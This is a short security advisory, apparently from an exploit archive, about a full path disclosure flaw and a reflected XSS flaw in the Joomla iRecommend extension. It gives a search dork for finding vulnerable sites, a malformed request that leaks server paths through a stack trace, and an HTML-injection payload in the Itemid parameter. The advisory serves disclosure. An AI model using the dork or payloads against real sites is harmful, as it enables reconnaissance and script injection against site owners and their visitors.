Joomla iRecommend XSS & FPD

2014.01.25
Credit: Smash_
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:com_irecommend OR inurl:irecommend

#Title: Joomla iRecommend - XSS & FPD #Version: >= 3.0 (Latest ATM) #Demo: joomla-demo.fok.com.br #About: extensions.joomla.org/extensions/content-sharing/bookmark-a-recommend/13584 #Dork: inurl:com_irecommend OR inurl:irecommend #Date: 01.24.2014 #Contant: smash[at]devilteam.pl 1. Full Path Disclosure - Recommend to a friend Request: GET /index.php?option=com_irecommend&content_title=<>666&content_url=<>666&tmpl=component HTTP/1.1 Host: demo.idealextensions.com Response: HTTP/1.1 200 OK Date: Fri, 24 Jan 2014 14:20:25 GMT Server: Apache mod_fcgid/2.3.6 X-Powered-By: PHP/5.3.25 X-Mod-Pagespeed: 1.3.25.4-2941 Vary: Accept-Encoding Cache-Control: max-age=0, no-cache Content-Length: 1023 Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html <br/> <b>Fatal error</b>: Uncaught exception 'InvalidArgumentException' with message 'Invalid URI detected.' in /home/ideal/public_html/_users/demo/libraries/joomla/environment/uri.php:194 Stack trace: #0 /home/ideal/public_html/_users/demo/libraries/joomla/factory.php(503): JURI::getInstance('SERVER') #1 /home/ideal/public_html/_users/demo/plugins/system/languagefilter/languagefilter.php(69): JFactory::getURI() #2 /home/ideal/public_html/_users/demo/libraries/joomla/plugin/helper.php(194): plgSystemLanguageFilter-&gt;__construct(Object(JDispatcher), Array) #3 /home/ideal/public_html/_users/demo/libraries/joomla/plugin/helper.php(125): JPluginHelper::_import(Object(stdClass), true, NULL) #4 /home/ideal/public_html/_users/demo/includes/application.php(61): JPluginHelper::importPlugin('system', 'languagefilter') #5 /home/ideal/public_html/_users/demo/index.php(30): JSite-&gt;initialise() #6 {main} thrown in <b>/home/ideal/public_html/_users/demo/libraries/joomla/environment/uri.php</b> on line <b>194</b><br/> 2. Cross Site Scripting - Recommend to a friend Vulnerable GET parameters: - id - catid - Itemid Example request: demo.idealextensions.com/index.php/en/?option=com_moofaq&view=article&id=10:content&catid=21:components&Itemid=117"><h1>SUP?</h1><!-- Now, click 'Recommend to a friend' button. SUP? will appear because of injection: <input type="hidden" name="content_url" value="http://demo.idealextensions.com/index.php/en/?option=com_moofaq&view=article&id=10:content&catid=21:components&Itemid=117"><h1>SUP?</h1><!--" /></form></div>

References:

http://devilteam.pl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top